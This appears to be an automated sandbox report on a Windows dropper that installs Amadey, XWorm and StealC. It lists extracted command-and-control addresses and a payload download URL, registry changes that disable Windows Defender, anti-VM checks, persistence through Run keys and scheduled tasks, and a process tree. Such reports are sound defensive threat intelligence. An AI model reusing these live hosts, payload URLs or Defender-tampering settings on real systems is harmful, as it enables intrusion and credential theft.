Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/03/2025, 04:27
Static task
static1
Behavioral task
behavioral1
Sample
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
Resource
win10v2004-20250314-en
General
-
Target
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
-
Size
1.8MB
-
MD5
d5f6e39b19e5b45d9953d4cb1401cc51
-
SHA1
c20f5112e5c6743247c3aa2939bbac098e7df551
-
SHA256
bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666
-
SHA512
b63a89ec0df2dd5c836e03d5c4f2b74acd5444499ac728eb66d9cc55d892b85819ceb10c98bb96067170fa4d0ac34cc72c3f839e8f4c1c740d7e50d27e6fb298
-
SSDEEP
24576:kUAfrVg7JIB/RwQTo1ozluw6kJ4AoZRvMfyTY/e63AlMYe/t4SHd4lU55eoyyT0O:7Af5g766QTNv6i4Zrng2lMff9Pei0
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
b.strongest.network:22394
arwpWzcFwkBy2ZX1
-
Install_directory
%AppData%
-
install_file
MsWin32tart.exe
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/files/0x00020000000001d0-697.dat family_xworm behavioral1/memory/2856-705-0x0000000000290000-0x00000000002BE000-memory.dmp family_xworm behavioral1/memory/1800-762-0x0000000000B30000-0x0000000000B5E000-memory.dmp family_xworm behavioral1/memory/2068-2242-0x0000000000AE0000-0x0000000000B0E000-memory.dmp family_xworm behavioral1/memory/4092-3392-0x0000000000EE0000-0x0000000000F0E000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3240-943-0x0000000001150000-0x000000000159C000-memory.dmp healer behavioral1/memory/3240-944-0x0000000001150000-0x000000000159C000-memory.dmp healer behavioral1/memory/3240-986-0x0000000001150000-0x000000000159C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 2333b79a4e.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 2333b79a4e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 2333b79a4e.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2333b79a4e.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 2333b79a4e.exe -
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3865a80d01.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1a69630561.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9a696af155.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2333b79a4e.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3340 powershell.exe 3268 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 9 IoCs
flow pid Process 5 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe 6 2692 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2168 takeown.exe 968 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1a69630561.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9a696af155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9a696af155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2333b79a4e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2333b79a4e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3865a80d01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1a69630561.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3865a80d01.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe -
Executes dropped EXE 15 IoCs
pid Process 2692 rapes.exe 2820 oalJJxv.exe 2888 kZZeUXM.exe 2236 Isolation.com 2528 apple.exe 1908 22.exe 2024 22.exe 2020 EPTwCQd.exe 2856 FjbTOQC.exe 1880 1a69630561.exe 2972 9a696af155.exe 564 4eb99fd09d.exe 1800 MsWin32tart.exe 3240 2333b79a4e.exe 3540 3865a80d01.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 1a69630561.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 9a696af155.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 2333b79a4e.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 3865a80d01.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe -
Loads dropped DLL 27 IoCs
pid Process 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2948 CMD.exe 2692 rapes.exe 2528 apple.exe 2528 apple.exe 2528 apple.exe 2528 apple.exe 2692 rapes.exe 2692 rapes.exe 1928 WerFault.exe 1928 WerFault.exe 1928 WerFault.exe 1928 WerFault.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2236 Isolation.com 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe 2692 rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2168 takeown.exe 968 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 2333b79a4e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2333b79a4e.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\MsWin32tart = "C:\\Users\\Admin\\AppData\\Roaming\\MsWin32tart.exe" FjbTOQC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\1a69630561.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346890101\\1a69630561.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\9a696af155.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346900101\\9a696af155.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\4eb99fd09d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346910101\\4eb99fd09d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\2333b79a4e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10346920101\\2333b79a4e.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000900000001a4e6-755.dat autoit_exe behavioral1/files/0x000400000001cf0f-3616.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 3304 tasklist.exe 2068 tasklist.exe 1464 tasklist.exe 3240 tasklist.exe 3272 tasklist.exe 920 tasklist.exe 3524 tasklist.exe 1576 tasklist.exe 3984 tasklist.exe 3808 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 2692 rapes.exe 1880 1a69630561.exe 2972 9a696af155.exe 3240 2333b79a4e.exe 3540 3865a80d01.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2236 set thread context of 1468 2236 Isolation.com 144 -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe File opened for modification C:\Windows\SpermWilderness kZZeUXM.exe File opened for modification C:\Windows\PtsFlooring kZZeUXM.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 952 sc.exe 1700 sc.exe 828 sc.exe 2960 sc.exe 2120 sc.exe 804 sc.exe 2740 sc.exe 564 sc.exe 1856 sc.exe 376 sc.exe 1224 sc.exe 448 sc.exe 1972 sc.exe 744 sc.exe 2196 sc.exe 1008 sc.exe 3048 sc.exe 2384 sc.exe 1612 sc.exe 3000 sc.exe 1652 sc.exe 1412 sc.exe 2252 sc.exe 680 sc.exe 1424 sc.exe 2388 sc.exe 2380 sc.exe 2088 sc.exe 2428 sc.exe 320 sc.exe 1548 sc.exe 904 sc.exe 1648 sc.exe 2272 sc.exe 1960 sc.exe 1284 sc.exe 2172 sc.exe 1396 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kZZeUXM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3865a80d01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1a69630561.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 4eb99fd09d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4eb99fd09d.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 4eb99fd09d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9a696af155.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2333b79a4e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3748 timeout.exe 1072 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2652 taskkill.exe 2976 taskkill.exe 2256 taskkill.exe 2128 taskkill.exe 2204 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1132 schtasks.exe 3688 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2856 FjbTOQC.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2024 22.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 2692 rapes.exe 2236 Isolation.com 2236 Isolation.com 2236 Isolation.com 1880 1a69630561.exe 1880 1a69630561.exe 1880 1a69630561.exe 1880 1a69630561.exe 1880 1a69630561.exe 2972 9a696af155.exe 564 4eb99fd09d.exe 2236 Isolation.com 2236 Isolation.com 3240 2333b79a4e.exe 3240 2333b79a4e.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 3240 2333b79a4e.exe 3240 2333b79a4e.exe 3540 3865a80d01.exe 3540 3865a80d01.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 476 Process not Found 476 Process not Found -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 1576 tasklist.exe Token: SeDebugPrivilege 1464 tasklist.exe Token: SeDebugPrivilege 2856 FjbTOQC.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 1800 MsWin32tart.exe Token: SeDebugPrivilege 2128 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe Token: SeDebugPrivilege 2652 taskkill.exe Token: SeDebugPrivilege 2976 taskkill.exe Token: SeDebugPrivilege 2796 firefox.exe Token: SeDebugPrivilege 2796 firefox.exe Token: SeDebugPrivilege 3240 2333b79a4e.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 2236 Isolation.com 2236 Isolation.com 2236 Isolation.com 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2236 Isolation.com 2236 Isolation.com 2236 Isolation.com 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe 564 4eb99fd09d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2344 wrote to memory of 2692 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 31 PID 2344 wrote to memory of 2692 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 31 PID 2344 wrote to memory of 2692 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 31 PID 2344 wrote to memory of 2692 2344 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 31 PID 2692 wrote to memory of 2820 2692 rapes.exe 33 PID 2692 wrote to memory of 2820 2692 rapes.exe 33 PID 2692 wrote to memory of 2820 2692 rapes.exe 33 PID 2692 wrote to memory of 2820 2692 rapes.exe 33 PID 2692 wrote to memory of 2888 2692 rapes.exe 34 PID 2692 wrote to memory of 2888 2692 rapes.exe 34 PID 2692 wrote to memory of 2888 2692 rapes.exe 34 PID 2692 wrote to memory of 2888 2692 rapes.exe 34 PID 2888 wrote to memory of 2948 2888 kZZeUXM.exe 35 PID 2888 wrote to memory of 2948 2888 kZZeUXM.exe 35 PID 2888 wrote to memory of 2948 2888 kZZeUXM.exe 35 PID 2888 wrote to memory of 2948 2888 kZZeUXM.exe 35 PID 2948 wrote to memory of 1576 2948 CMD.exe 37 PID 2948 wrote to memory of 1576 2948 CMD.exe 37 PID 2948 wrote to memory of 1576 2948 CMD.exe 37 PID 2948 wrote to memory of 1576 2948 CMD.exe 37 PID 2948 wrote to memory of 1796 2948 CMD.exe 38 PID 2948 wrote to memory of 1796 2948 CMD.exe 38 PID 2948 wrote to memory of 1796 2948 CMD.exe 38 PID 2948 wrote to memory of 1796 2948 CMD.exe 38 PID 2948 wrote to memory of 1464 2948 CMD.exe 40 PID 2948 wrote to memory of 1464 2948 CMD.exe 40 PID 2948 wrote to memory of 1464 2948 CMD.exe 40 PID 2948 wrote to memory of 1464 2948 CMD.exe 40 PID 2948 wrote to memory of 2152 2948 CMD.exe 41 PID 2948 wrote to memory of 2152 2948 CMD.exe 41 PID 2948 wrote to memory of 2152 2948 CMD.exe 41 PID 2948 wrote to memory of 2152 2948 CMD.exe 41 PID 2948 wrote to memory of 3052 2948 CMD.exe 42 PID 2948 wrote to memory of 3052 2948 CMD.exe 42 PID 2948 wrote to memory of 3052 2948 CMD.exe 42 PID 2948 wrote to memory of 3052 2948 CMD.exe 42 PID 2948 wrote to memory of 1436 2948 CMD.exe 43 PID 2948 wrote to memory of 1436 2948 CMD.exe 43 PID 2948 wrote to memory of 1436 2948 CMD.exe 43 PID 2948 wrote to memory of 1436 2948 CMD.exe 43 PID 2948 wrote to memory of 2444 2948 CMD.exe 44 PID 2948 wrote to memory of 2444 2948 CMD.exe 44 PID 2948 wrote to memory of 2444 2948 CMD.exe 44 PID 2948 wrote to memory of 2444 2948 CMD.exe 44 PID 2948 wrote to memory of 2332 2948 CMD.exe 45 PID 2948 wrote to memory of 2332 2948 CMD.exe 45 PID 2948 wrote to memory of 2332 2948 CMD.exe 45 PID 2948 wrote to memory of 2332 2948 CMD.exe 45 PID 2948 wrote to memory of 1936 2948 CMD.exe 46 PID 2948 wrote to memory of 1936 2948 CMD.exe 46 PID 2948 wrote to memory of 1936 2948 CMD.exe 46 PID 2948 wrote to memory of 1936 2948 CMD.exe 46 PID 2948 wrote to memory of 2236 2948 CMD.exe 47 PID 2948 wrote to memory of 2236 2948 CMD.exe 47 PID 2948 wrote to memory of 2236 2948 CMD.exe 47 PID 2948 wrote to memory of 2236 2948 CMD.exe 47 PID 2948 wrote to memory of 1564 2948 CMD.exe 48 PID 2948 wrote to memory of 1564 2948 CMD.exe 48 PID 2948 wrote to memory of 1564 2948 CMD.exe 48 PID 2948 wrote to memory of 1564 2948 CMD.exe 48 PID 2692 wrote to memory of 2528 2692 rapes.exe 49 PID 2692 wrote to memory of 2528 2692 rapes.exe 49 PID 2692 wrote to memory of 2528 2692 rapes.exe 49 PID 2692 wrote to memory of 2528 2692 rapes.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe"C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
